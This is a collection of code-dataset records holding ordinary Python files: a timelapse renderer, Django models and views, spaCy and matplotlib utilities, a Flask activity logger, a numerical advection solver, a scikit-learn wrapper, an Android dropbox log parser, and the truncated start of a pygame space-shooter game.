os.path.join(video_cache, f'tmp')\n if os.path.exists(tmp_folder):\n logging.error('tmp folder exists. Abort generation.')\n raise TimelapseTmpFolderExistsError(tmp_folder)\n os.mkdir(tmp_folder)\n\n # Prepare the map\n logging.info('Generation start...')\n stars = Star.query.filter(Star.game_id == game_id).all()\n m = Map(stars, **map_config)\n\n # Generate images\n for tick in range(start_tick, end_tick + 1):\n if tick % 24 == 0:\n logging.info(f'Generating tick {tick}')\n owners = Owner.query.filter(Owner.game_id == game_id) \\\n .filter(Owner.tick == tick).all()\n if owners:\n m.update(owners)\n m.save(os.path.join(tmp_folder, f'{tick:04}.png'))\n\n # Make a video\n logging.info('Rendering video')\n images = glob.glob(os.path.join(tmp_folder, '*.png'))\n images.sort()\n video = mpy.ImageSequenceClip(images, fps=24)\n video.write_videofile(tl_path)\n \n # Cleanup the tmp_folder\n logging.info('Cleanup')\n for image in images:\n os.remove(image)\n os.rmdir(tmp_folder)\n logging.info('Generation successfull')\n\n return\n","sub_path":"nptimelapse/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"399766105","text":"from django.db import models\r\nfrom django.utils.text import slugify\r\nfrom django.utils.translation import ugettext, ugettext_lazy as _\r\nfrom unidecode import unidecode\r\nfrom project import settings\r\nimport os\r\n\r\n\r\ndef imageFilename(self, filename):\r\n ext = filename.split('.')[-1]\r\n app_name = self._meta.app_label\r\n model_name = self._meta.model_name\r\n name_attrs = ['id'+str(self.pk)]\r\n name = ''\r\n parent = self\r\n models_attrs = ['slug','code']\r\n while parent != None:\r\n for attr in models_attrs:\r\n if hasattr(parent, attr):\r\n if getattr(parent, attr) != None:\r\n name_attrs.insert(0, str(getattr(parent, attr)))\r\n if hasattr(parent, 'brand'):\r\n name_attrs.insert(0, str(parent.brand.slug))\r\n if hasattr(parent, 'parent'):\r\n parent = parent.parent\r\n else:\r\n parent = None\r\n name = '_'.join(name_attrs)\r\n name = slugify(str(name))\r\n \r\n # APP NAME PATH\r\n app_name_path = settings.MEDIA_ROOT + app_name + '/'\r\n app_name_dir = os.path.isdir(app_name_path)\r\n if app_name_dir == False:\r\n os.mkdir(app_name_path)\r\n\r\n # MODEL NAME PATH\r\n model_name_path = settings.MEDIA_ROOT + app_name + '/' + model_name + '/'\r\n model_name_dir = os.path.isdir(model_name_path)\r\n if model_name_dir == False:\r\n os.mkdir(model_name_path)\r\n path = '/'.join([app_name, model_name])\r\n return path, name, ext\r\n\r\n\r\nclass OneFile(models.Model):\r\n num = models.PositiveIntegerField(default=0, blank=True, verbose_name=_(\"Номер\"))\r\n name = models.CharField(max_length=100, blank=True, default=\"\", verbose_name=_(\"Название\"))\r\n slug = models.CharField(max_length=250, blank=True, null=True, verbose_name=_(\"Иденитификатор\"), editable=False)\r\n file = models.FileField(upload_to='temp', blank=False, null=True)\r\n file_url = models.CharField(max_length=1000, blank=True, editable=False)\r\n ext = models.CharField(max_length=100, blank=True, editable=False, verbose_name=_(\"file extension\"))\r\n\r\n class Meta:\r\n ordering = ['-num']\r\n abstract = True\r\n\r\n def save(self):\r\n \r\n super(OneFile, self).save()\r\n\r\n if len(self.name) == 0:\r\n try:\r\n modelName = self.__class__._meta.verbose_name.title()\r\n self.name = ' '.join([modelName, self.product.category.name, self.product.name, 
self.product.code])\r\n except:\r\n self.name = self.__class__.__name__\r\n \r\n\r\n self.slug = slugify(unidecode(self.name) + '-' + str(self.pk))\r\n if self.file.url != '/media/' + self.file_url:\r\n path, name, ext = imageFilename(self, self.file.name)\r\n self.ext = ext.lower()\r\n \r\n # f_name = \r\n\r\n filename = f'{path}/{self.slug}.{ext}'\r\n tempFile = self.file.name\r\n with open(settings.MEDIA_ROOT + self.file.name, \"rb\") as f1:\r\n raw = f1.read()\r\n with open(settings.MEDIA_ROOT + filename, 'wb') as f:\r\n f.write(raw)\r\n\r\n setattr(getattr(self, 'file'), 'name', filename)\r\n setattr(self, 'file_url', filename)\r\n\r\n try: os.remove(settings.MEDIA_ROOT + tempFile)\r\n except: pass\r\n \r\n super(OneFile, self).save()\r\n\r\n\r\n def delete(self):\r\n try:\r\n os.remove(settings.MEDIA_ROOT + self.file.name)\r\n except: pass\r\n super(OneFile, self).delete()","sub_path":"apps/core/models/models__file.py","file_name":"models__file.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"237680696","text":"import spacy\nimport pandas as pd\nfrom IPython.display import display\n\ndef tokens_to_df(doc, properties=None, is_display=True):\n \n texts = [token.text for token in doc] \n index = [token.i for token in doc] \n if properties is None:\n properties = ['text', 'i', 'idx', 'text_with_ws', 'is_sent_start', 'is_sent_end', \n 'head', 'dep_', 'ent_type_', 'tag_', 'lemma_', \n 'norm_', 'is_stop', 'is_oov', ('tag_explain', token_explain('tag_'))]\n columns = [property_ if isinstance(property_, str) else property_[0] \n for property_ in properties] \n df_token = pd.DataFrame(columns = columns,\n index = index) \n for token in doc: \n for property_ in properties:\n if isinstance(property_, str): \n df_token.loc[token.i, property_] = getattr(token, property_)\n else:\n df_token.loc[token.i, property_[0]] = property_[1](token)\n \n if is_display:\n df_token = df_token.style.set_properties(**{'text-align': 'left'}) \n display(df_token)\n return df_token\n\ndef tokens_to_sheet(doc, properties=None):\n if properties is None:\n properties = [('text', 15), ('tag_', 15), ('head', 15), ('dep_', 15), \n (('tag_explain', token_explain('tag_')), 30)]\n \n headers = [property_ if isinstance(property_, str) else property_[0] \n for property_, width in properties]\n widths = [width for _, width in properties]\n header_text = ''.join([f'{header:<{width}}' for header, width in zip(headers, widths)]) \n \n row_texts =[]\n for token in doc: \n column_values = []\n for property_, width in properties:\n if isinstance(property_, str): \n column_values.append(str(getattr(token, property_)))\n else:\n column_values.append(str(property_[1](token)))\n row_text = ''.join([f'{value:<{width}}' for value, width in zip(column_values, widths)])\n row_texts.append(row_text)\n \n print(header_text)\n max_len = max([len(row_text) for row_text in row_texts]) + 2\n print('-'*max_len)\n for row_text in row_texts:\n print(row_text) \n \n\ndef token_explain(property_):\n def explain(token):\n return spacy.explain(getattr(token, property_)) \n return explain\n\n\n","sub_path":"_notes/05-ai/45-nlp/spacy/mastering_spacy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"192448766","text":"\"\"\"\nLet's annotate some interesting points using the annotate\ncommand. 
We chose the 2pi/3 value and we want to annotate both\nthe sine and the cosine. We'll first draw a marker on the curve\nas well as a straight dotted line. Then, we'll use the annotate\ncommand to display some text with an arrow.\nIf your dashed lines don't quite match the goal, try drawing\nthem in the opposite direction.\n:lesson goal file: goal08.py\n\"\"\"\n\n# Imports\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nx = np.linspace(-np.pi, np.pi, 256, endpoint=True)\nc, s = np.cos(x), np.sin(x)\n\n# Plot cosine using blue color with a continuous line of width 2 (pixels)\nplt.plot(x, c, color=\"blue\", linewidth=2.0, linestyle=\"-\", label='cosine')\n\n# Plot sine using red color with a continuous line of width 2 (pixels)\nplt.plot(x, s, color=\"red\", linewidth=2.0, linestyle=\"-\", label='sine')\n\nplt.legend(loc='upper left', frameon=False)\n\nt = 2*np.pi/3\nplt.plot([t, t/2], [-1, -0.2], color='blue', linewidth=1.5, linestyle=\"--\")\nplt.scatter([t/2], [-0.2], 50, color='blue')\n\nplt.annotate(r'$\\cos(\\frac{2\\pi}{3})=-\\frac{1}{2}$',\n xy=(t, np.cos(t)), xycoords='data',\n xytext=(-90, -50), textcoords='offset points', fontsize=16,\n arrowprops=dict(arrowstyle=\"-|>\", connectionstyle=\"arc3,rad=.2\"))\n\nplt.plot([t, t], [0, np.sin(t)], color='red', linewidth=1.5, linestyle=\":\")\nplt.scatter([t], [np.sin(t)], 50, color='red')\n\nplt.annotate(r'$\\sin(\\frac{2\\pi}{30})=\\frac{\\sqrt{3}}{2}$',\n xy=(t, np.sin(t)), xycoords='data',\n xytext=(+10, +30), textcoords='offset points', fontsize=16,\n arrowprops=dict(arrowstyle=\"->\", connectionstyle=\"arc3,rad=.2\"))\n\n# Set x limits\nplt.xlim(x.min()*1.1, x.max()*1.1)\n\n# Set x ticks\nplt.xticks([-np.pi, -np.pi/2, 0, np.pi/2, np.pi],\n [r'$-\\pi$', r'$-\\pi/2$', r'$0$', r'$+\\pi/2$', r'$+\\pi$'])\n\n# Set y limits\nplt.ylim(c.min()*1.1, c.max()*1.1)\n\n# Set y ticks\nplt.yticks([-1, 0, 1])\n\nax = plt.gca()\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\nax.spines['bottom'].set_position(('data', 0))\nax.xaxis.set_ticks_position('bottom')\nax.spines['left'].set_position(('data', 0))\nax.yaxis.set_ticks_position('left')\n\n# Show result on screen\nplt.show()\n","sub_path":"docs/lessons/lesson08_annotate.py","file_name":"lesson08_annotate.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"456688780","text":"# from django.shortcuts import render\nfrom datetime import timedelta\nfrom django.http import HttpResponse\nfrom gottesdienste.models import Gottesdienst\nfrom ics import Calendar, Event\n\ndef gottesdienste(request):\n c = Calendar(events=gottesdienste_as_events())\n response = HttpResponse(content_type='text/calendar')\n response['Content-Disposition'] = 'attachment; filename=\"Gottesdienste.ics\"'\n response.write(c)\n return response\n\ndef gottesdienste_as_events():\n gd = Gottesdienst.objects.all()\n return [Event(name=g.titel, \n begin=g.datum, \n duration=timedelta(minutes=g.dauer), \n description=g.freitext, \n location=g.ort or u\"Thomaskirche Kempen\")\n for g in gd]\n","sub_path":"kalender/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"314763377","text":"import csv\nimport os\nimport re\n\nfrom lxml import etree\n\nimport config\n\n\ndef match_regex(pattern, string, position=0, tuple_pos=0):\n m = re.findall(pattern, string)\n if m:\n if position <= len(m) + 
1:\n if isinstance(m[position], tuple):\n if tuple_pos <= len(m[position]) + 1:\n return m[position][tuple_pos].strip()\n else:\n return m[position].strip()\n return ''\n\n\ndef write_csv(filename, content, keys=[]):\n create_directory_if_not_exists(filename)\n with open(filename, 'w') as file:\n writer = csv.DictWriter(file, keys, delimiter=';')\n writer.writeheader()\n writer.writerows(content)\n\n\ndef create_directory_if_not_exists(filename):\n directory = os.path.dirname(filename)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef write_xml(values):\n for value in values:\n xml_path = re.sub(r'^/', '',\n re.sub(r'docx|doc|pdf$', 'xml', value['path']))\n xml_path = os.path.join(config.XML_FOLDER_PATH, xml_path)\n\n root = etree.Element('root')\n for key, val in value.items():\n node = etree.SubElement(root, key)\n node.text = val\n\n write_file(xml_path,\n etree.tostring(root, pretty_print=True, encoding='unicode'))\n\n\ndef write_file(filename, content):\n create_directory_if_not_exists(filename)\n with open(filename, 'w') as file:\n file.write(content)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"148117091","text":"#!/usr/bin/env python3\n\n\"\"\"A simple dropbox parser\n\nThis is a simple tool that can parse errors in android dropbox and\nprint errors on stardand output, The errors are stored in a global\ndict variable named \"result\".\n\"\"\"\n\nimport os\nimport sys\nimport re\nimport gzip\nimport shutil\nimport time\n\nfrom datetime import datetime\n\n# 'result' variable has the following structure:\n#\n# {\"UNKNOWN_RESET\" : [time, ...],\n# \"FRAMEWORK_REBOOT\" : [time ...],\n# \"SYSTEM_RESTART\" : [time, ...],\n# \"SYSTEM_BOOT\" : [time, ...],\n# \"system_server_watchdog\" : [time ...],\n# \"system_server_crash\" : [time ...],\n# \"SYSTEM_FSCK\" : [time, ...],\n# \"system_server_anr\" : [time ...],\n# \"system_app_crash\" : {\"packagename\" : [time ...], ...},\n# \"system_app_native_crash\" : {\"packagename\" : [time ...], ...},\n# \"data_app_native_crash\" : {\"packagename\" : [time ...], ...},\n# \"data_app_crash\" : {\"packagename\" : [time ...], ...},\n# \"system_app_anr\" : {\"packagename\" : [time, ...], ...},\n# \"data_app_anr\" : {\"packagename\" : [time, ...], ...},\n# \"SYSTEM_TOMBSTONE\" : {\"packagename\" : [time, ...], ...},\n# \"system_app_wtf\" : {\"packagename\" : [time, ...], ...},\n# \"SYSTEM_LAST_KMSG\" : [time, ...],\n# \"SYSTEM_RECOVERY_KMSG\" : [time, ...],\n# \"SYSTEM_AUDIT\" : [time, ...],\n# \"system_server_wtf\" : [time, ...]\n# }\nresult = {}\nverbose = False\ndropboxpath = \"\"\n\n\ndef usage():\n print(\"Usage: python \" + sys.argv[0] + \" [-v] \\n\")\n print(\" [-v]: Verbose output, default not\")\n print(\" : Path to the dropbox, which is Mandatory\")\n\n\ndef has_timestamp(filename):\n pathname = os.path.join(dropboxpath, filename)\n if os.path.isdir(pathname):\n return False\n if re.search(r\"[0-9]{1,}\", filename):\n return True\n else:\n return False\n\n\ndef gettime_readable(filename):\n \"\"\"return a human readable time string\"\"\"\n unix_time = gettime_unix(filename)\n return datetime.fromtimestamp(int(unix_time[:-3])).isoformat(\" \")\n\n\ndef gettime_unix(filename):\n m = re.search(r\"[0-9]{1,}\", filename)\n return m.group(0)\n\n\ndef unix_to_readable(unix_time):\n time_local = time.localtime(int(unix_time[:-3]))\n return time.strftime(\"%Y-%m-%d %H:%M:%S\", 
time_local)\n\n\ndef get_pkgname_sys_app_crash(pathname):\n with open(pathname, errors='ignore') as f:\n firstline = f.readline()\n return firstline.split(\":\")[1].strip()\n\n\ndef get_pkgname_sys_app_anr(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef get_pkgname_data_app_anr(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef get_pkgname_data_app_crash(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef get_pkgname_sys_app_native_crash(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef get_pkgname_data_app_native_crash(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef get_pkgname_system_tombstone(filepath):\n pkgname = \"UNKNOWN\"\n with open(filepath, errors='ignore') as f:\n for line in f:\n if \">>> \" in line:\n pkgname = line.split(\">>>\")[1].strip().split()[0]\n break\n return pkgname\n\n\ndef get_pkgname_sys_app_strictmode(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef get_pkgname_sys_app_wtf(filepath):\n return get_pkgname_sys_app_crash(filepath)\n\n\ndef ungzip(filename):\n \"\"\"extract gzip file\"\"\"\n subdir = filename[:-3]\n abs_filename = os.path.join(dropboxpath, filename)\n extract_to = os.path.join(dropboxpath, subdir)\n if os.path.exists(extract_to):\n shutil.rmtree(extract_to)\n uncompressfilename = os.path.join(extract_to, subdir)\n gzfile = gzip.GzipFile(mode='rb', fileobj=open(abs_filename, 'rb'))\n os.mkdir(extract_to)\n open(uncompressfilename, 'wb').write(gzfile.read())\n return uncompressfilename\n\n\ndef parse_time(filename):\n \"\"\"get time of the error\"\"\"\n pattern = filename.split(\"@\", 1)[0]\n times = []\n time = gettime_unix(filename)\n if pattern in result:\n times = result[pattern]\n times.append(time)\n else:\n times = [time]\n\n result[pattern] = times\n\n\ndef parse_pkgname(filename):\n \"\"\"get time and package name of the error event\"\"\"\n unix_time = gettime_unix(filename)\n if filename.endswith(\".gz\"):\n filepath = ungzip(filename)\n else:\n filepath = os.path.join(dropboxpath, filename)\n pattern = filename.split(\"@\", 1)[0]\n if pattern == \"system_app_crash\":\n packagename = get_pkgname_sys_app_crash(filepath)\n elif pattern == \"system_app_anr\":\n packagename = get_pkgname_sys_app_anr(filepath)\n elif pattern == \"data_app_crash\":\n packagename = get_pkgname_data_app_crash(filepath)\n elif pattern == \"data_app_anr\":\n packagename = get_pkgname_data_app_anr(filepath)\n elif pattern == \"system_app_native_crash\":\n packagename = get_pkgname_sys_app_native_crash(filepath)\n elif pattern == \"data_app_native_crash\":\n packagename = get_pkgname_data_app_native_crash(filepath)\n elif pattern == \"SYSTEM_TOMBSTONE\":\n packagename = get_pkgname_system_tombstone(filepath)\n elif pattern == \"system_app_strictmode\":\n packagename = get_pkgname_sys_app_strictmode(filepath)\n elif pattern == \"system_app_wtf\":\n packagename = get_pkgname_sys_app_wtf(filepath)\n\n if pattern not in result:\n result[pattern] = {}\n\n if packagename not in result[pattern]:\n result[pattern][packagename] = []\n\n if unix_time not in result[pattern][packagename]:\n result[pattern][packagename].append(unix_time)\n\n\ndef parse(filename):\n pattern = filename.split(\"@\", 1)[0]\n if pattern == \"UNKNOWN_RESET\" or \\\n pattern == \"FRAMEWORK_REBOOT\" or \\\n pattern == \"SYSTEM_RESTART\" or \\\n pattern == \"SYSTEM_BOOT\" or \\\n pattern == \"system_server_watchdog\" or \\\n pattern == \"system_server_crash\" or \\\n pattern == \"SYSTEM_FSCK\" or \\\n pattern == 
\"system_server_anr\" or \\\n pattern == \"SYSTEM_LAST_KMSG\" or \\\n pattern == \"SYSTEM_RECOVERY_KMSG\" or \\\n pattern == \"SYSTEM_AUDIT\" or \\\n pattern == \"system_server_wtf\":\n parse_time(filename)\n elif pattern == \"system_app_crash\" or \\\n pattern == \"data_app_crash\" or \\\n pattern == \"system_app_strictmode\" or \\\n pattern == \"system_app_anr\" or \\\n pattern == \"data_app_anr\" or \\\n pattern == \"system_app_native_crash\" or \\\n pattern == \"data_app_native_crash\" or \\\n pattern == \"SYSTEM_TOMBSTONE\" or \\\n pattern == \"system_app_wtf\":\n parse_pkgname(filename)\n else:\n #print(\"UNKNOW TYPE: \", pattern)\n pass\n\n\ndef print_result(result):\n \"\"\"print the result\"\"\"\n if result == {}:\n print(\"NO DROPBOX ERROR LOG FOUND!\")\n return\n format = \"%-50s%-30s%-10s\"\n print(format % (\"PACKAGE NAME\", \"TIME\", \"COUNT\"))\n print()\n for key, value in result.items():\n print(key.center(90, '-'))\n if type(value) == list:\n if not verbose:\n print(format % (key, unix_to_readable(value[-1]), len(value)))\n else:\n for i in range(len(value)):\n print(format % (key, unix_to_readable(value[i]), i+1))\n elif type(value) == dict:\n for p, t in value.items():\n if not verbose:\n print(format % (p, unix_to_readable(t[-1]), len(t)))\n else:\n for i in range(len(t)):\n print(format % (p, unix_to_readable(t[i]), i+1))\n print()\n\n\ndef main():\n if len(sys.argv) > 3:\n usage()\n sys.exit(-1)\n\n for arg in sys.argv[1:]:\n if arg == \"-v\":\n global verbose\n verbose = True\n elif os.path.isdir(arg):\n global dropboxpath\n dropboxpath = arg\n else:\n usage()\n sys.exit(-1)\n\n if dropboxpath == \"\":\n usage()\n sys.exit(-1)\n\n all_items = os.listdir(dropboxpath)\n files_with_timestamp = [x for x in all_items if has_timestamp(x)]\n\n for f in files_with_timestamp:\n parse(f)\n\n print_result(result)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"dropbox_parser.py","file_name":"dropbox_parser.py","file_ext":"py","file_size_in_byte":8246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"634391030","text":"from flask import Flask, request\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os import environ\nimport requests\nfrom datetime import datetime\n\nimport json\nimport os\nimport amqp_setup\n\napp = Flask(__name__)\n \n\napp.config['SQLALCHEMY_DATABASE_URI'] = environ.get('dbURL') or 'mysql+mysqlconnector://root@localhost:3306/activity'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\n\nclass Activity(db.Model):\n __tablename__ = 'activity'\n id = db.Column(db.Integer, primary_key=True)\n activity_date_time = db.Column(db.DateTime, nullable=False)\n activity_type = db.Column(db.String(300), nullable=False)\n activity_name = db.Column(db.String(100), nullable=False)\n customer_id = db.Column(db.String(32), nullable=False)\n info = db.Column(db.String(1000), nullable=False)\n\nmonitorBindingKey='*.info'\n\ndef consume():\n amqp_setup.check_setup()\n queue_name = 'Activity_Log'\n amqp_setup.channel.basic_consume(queue=queue_name, on_message_callback=callback, auto_ack=True)\n amqp_setup.channel.start_consuming()\n\n\ndef callback(channel, method, properties, body): # required signature for the callback; no return\n print(\"\\nReceived an activity log by \" + __file__)\n processOrderLog(json.loads(body))\n print() # print a new line feed\n\n\ndef processOrderLog(order): \n print(\"Recording an activity log:\")\n\n activity_date_time = datetime.now()\n activity_type = 
order['type']\n    activity_name = order['activity_name']\n    customer_id = order['data']['customer_id']\n    info = json.dumps(order)\n    activity = Activity(activity_date_time=activity_date_time,activity_type=activity_type,activity_name=activity_name,customer_id=customer_id, info=info)\n    db.session.add(activity)\n    db.session.commit()\n\nif __name__ == \"__main__\": \n    print(\"\\nThis is \" + os.path.basename(__file__), end='')\n    print(\": monitoring routing key '{}' in exchange '{}' ...\".format(monitorBindingKey, amqp_setup.exchangename))\n    consume()","sub_path":"activity_log.py","file_name":"activity_log.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"178084386","text":"\"\"\"\nAdvection equation\nFTCS and Lax-Friedrichs methods\n\n@author: Ronan Legin\nFeb. 28th 2020\n\"\"\"\n\n# Include necessary packages\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Evolve f with the ftcs method\ndef evolve_ftcs(f,u,dx,dt):\n    # By only changing the values within domain and not on boundary\n    # i.e not f[0] or f[-1], then I'm keeping the boundary fixed.\n    f[1:-1] = f[1:-1] - u*dt/(2*dx)*(f[2:] - f[:-2])\n    return f\n\n# Evolve f with the Lax-Friedrichs method\ndef evolve_lax(f,u,dx,dt):\n    f[1:-1] = -u*dt/(2*dx)*(f[2:]-f[:-2]) + 1/2*(f[2:] + f[:-2])\n    return f\n\n# Initialize scalar quantities\nnpix = 1000\nu = -0.1\ndx = 1.0\ndt = dx/(40.0*np.abs(u))\nsteps = 70000\n\n# Code for plotting\nplt.ion()\nfig, (ax1, ax2) = plt.subplots(1, 2)\nax1.set_title(\"FTCS\")\nax1.set_xlabel(\"x\",fontsize=14)\nax1.set_ylabel(\"f(x)\",fontsize=14)\nax2.set_title(\"LAX\")\nax2.set_xlabel(\"x\",fontsize=14)\nfig.set_size_inches(6, 5)\nfig.canvas.draw()\n\n# Initialize our function f for both ftcs and Lax-Friedrichs methods\nx = np.arange(0,npix)*dx\nf_ftcs = np.arange(0,npix)*dx\nf_lax = np.arange(0,npix)*dx\n\np1, = ax1.plot(x,f_ftcs)\np2, = ax2.plot(x,f_lax)\n\nfor n in np.arange(0,steps):\n    # First and only step is to evolve the function f using both methods\n    f_ftcs = evolve_ftcs(f_ftcs,u,dx,dt)\n    f_lax = evolve_lax(f_lax,u,dx,dt)\n\n    if n%100 == 0:\n        p1.set_ydata(f_ftcs)\n        p2.set_ydata(f_lax)\n        fig.canvas.draw()\n        plt.pause(0.01)","sub_path":"advection.py","file_name":"advection.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"232301977","text":"from operation.util import HDFSSERVER, LOG\nimport json\nfrom sklearn.naive_bayes import ComplementNB\n\ndef Complement_Naive_Bayes(input_data_path_1, input_data_path_2,output_data_path, alpha, fit_prior, class_prior, norm):\n    '''\n\n    :param input_data_path_1:\n    :param input_data_path_2:\n    :param output_data_path:\n    :param alpha: 1.0\n    :param fit_prior: True\n    :param class_prior: None\n    :param norm: False\n    :return:\n    '''\n    x_train, y_train, alpha, fit_prior, class_prior, norm = HDFSSERVER.load_data(input_data_path_1, input_data_path_2, alpha, fit_prior, class_prior, norm)\n    CNB = ComplementNB(alpha=alpha, fit_prior=fit_prior, class_prior=class_prior, norm=norm)\n    CNB.fit(x_train, y_train)\n    HDFSSERVER.save_model(output_data_path, CNB)\n    LOG.info(\"function CNB run success\")\n    result = json.dumps({'result' : 'success'})\n    return result\n","sub_path":"TestForSkill/scikit_LearnOp/ComplementNaiveBayes.py","file_name":"ComplementNaiveBayes.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
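[Editor's note] In the ComplementNaiveBayes.py record above (as corrected), the estimator's hyperparameters must be passed to the ComplementNB constructor before fit() is called; the original built a second, unused instance after fitting a default one. A minimal scikit-learn sketch with toy data (shapes and values invented for illustration):

    import numpy as np
    from sklearn.naive_bayes import ComplementNB

    X = np.random.randint(5, size=(6, 10))  # toy non-negative count features
    y = np.array([1, 2, 3, 4, 5, 6])

    # Configure first, then fit -- mirrors the corrected record above.
    clf = ComplementNB(alpha=1.0, fit_prior=True, class_prior=None, norm=False)
    clf.fit(X, y)
    print(clf.predict(X[:2]))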
+{"seq_id":"503661676","text":"##########################################\n# Author: Manbir Singh Judge\n# Date: 12-7-2021 to 13-7-2021\n# Todo: Background Music, Help Menu, Settings Menu, Support for Arrow Keys, Different speed of ships, bullets of enemies become for powerfull and freqeunt and level increases\n# Tools Used ( except Comipler etc. ): Sublime Text 3\n##########################################\n\nimport pygame\nimport os\nimport time\nimport random\nimport sys\n\npygame.mixer.init()\npygame.font.init()\n\nWIDTH, HEIGHT = 750, 750\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('Space Invader by Manbir Singh Judge')\n\n# Space Ships\nRED_SPACE_SHIP = pygame.image.load(os.path.join('assets', 'pixel_ship_red_small.png'))\nGREEN_SPACE_SHIP = pygame.image.load(os.path.join('assets', 'pixel_ship_green_small.png'))\nBLUE_SPACE_SHIP = pygame.image.load(os.path.join('assets', 'pixel_ship_blue_small.png'))\nYELLOW_SPACE_SHIP = pygame.image.load(os.path.join('assets', 'pixel_ship_yellow.png')) # Player's Ship\n\n# Lasers\nRED_LASER = pygame.image.load(os.path.join('assets', 'pixel_laser_red.png'))\nGREEN_LASER = pygame.image.load(os.path.join('assets', 'pixel_laser_green.png'))\nBLUE_LASER = pygame.image.load(os.path.join('assets', 'pixel_laser_blue.png'))\nYELLOW_LASER = pygame.image.load(os.path.join('assets', 'pixel_laser_yellow.png'))\n\n\n# Background\nBG = pygame.transform.scale(pygame.image.load(os.path.join('assets', 'background-black.png')), (WIDTH, HEIGHT))\n\n# SFX\nCHANNEL_0 = pygame.mixer.Channel(0)\nCHANNEL_1 = pygame.mixer.Channel(1)\nCHANNEL_2 = pygame.mixer.Channel(2)\n\nBOOM_SOUND = pygame.mixer.Sound('assets/sounds/boom.wav')\nSHOOT_SOUND = pygame.mixer.Sound('assets/sounds/laser_1.mp3')\nLOST_SOUND = pygame.mixer.Sound('assets/sounds/lost.mp3')\n\nclass Laser:\n\tdef __init__(self, x, y, img):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.img = img\n\t\tself.mask = pygame.mask.from_surface(self.img)\n\n\tdef draw(self, window):\n\t\twindow.blit(self.img, (self.x, self.y))\n\n\tdef move(self, vel):\n\t\tself.y += vel\n\n\tdef off_screen(self, height):\n\t\treturn not(self.y <= height and self.y >= 0)\n\n\tdef collision(self, obj):\n\t\treturn collide(self, obj)\n\n\nclass Ship:\n\tCOOLDOWN = 1 # How Fast Can you Shoot Lasers ( If FPS = 60 and COOLDOWN = 30, then Delay In Shooting will be Half a Second )\n\n\tdef __init__(self, x, y, health=100):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.health = health\n\t\tself.ship_img = None\n\t\tself.laser_img = None\n\t\tself.lasers = []\n\t\tself.cool_down_counter = 0\n\n\tdef draw(self, window):\n\t\twindow.blit(self.ship_img, (self.x, self.y))\n\n\t\tfor laser in self.lasers:\n\t\t\tlaser.draw(window)\n\n\tdef move_lasers(self, vel, obj):\n\t\tself.cooldown()\n\n\t\tfor laser in self.lasers:\n\t\t\tlaser.move(vel)\n\n\t\t\tif laser.off_screen(HEIGHT):\n\t\t\t\tself.lasers.remove(laser)\n\n\t\t\telif laser.collision(obj):\n\t\t\t\tobj.health -= 10\n\t\t\t\tself.lasers.remove(laser)\n\n\t# CONFUSE\n\tdef cooldown(self):\n\t\tif self.cool_down_counter >= self.COOLDOWN:\n\t\t\tself.cool_down_counter = 0\n\n\t\telif self.cool_down_counter > 0:\n\t\t\tself.cool_down_counter += 1\n\n\t# CONFUSE\n\tdef shoot(self):\n\t\tif self.cool_down_counter == 0:\n\t\t\tlaser = Laser(self.x, self.y, self.laser_img)\n\t\t\tself.lasers.append(laser)\n\n\t\t\tself.cool_down_counter = 1\n\n\t\t\tif self.ship_img == YELLOW_SPACE_SHIP:\n\t\t\t\tCHANNEL_0.play(SHOOT_SOUND)\n\n\n\tdef get_width(self):\n\t\treturn 
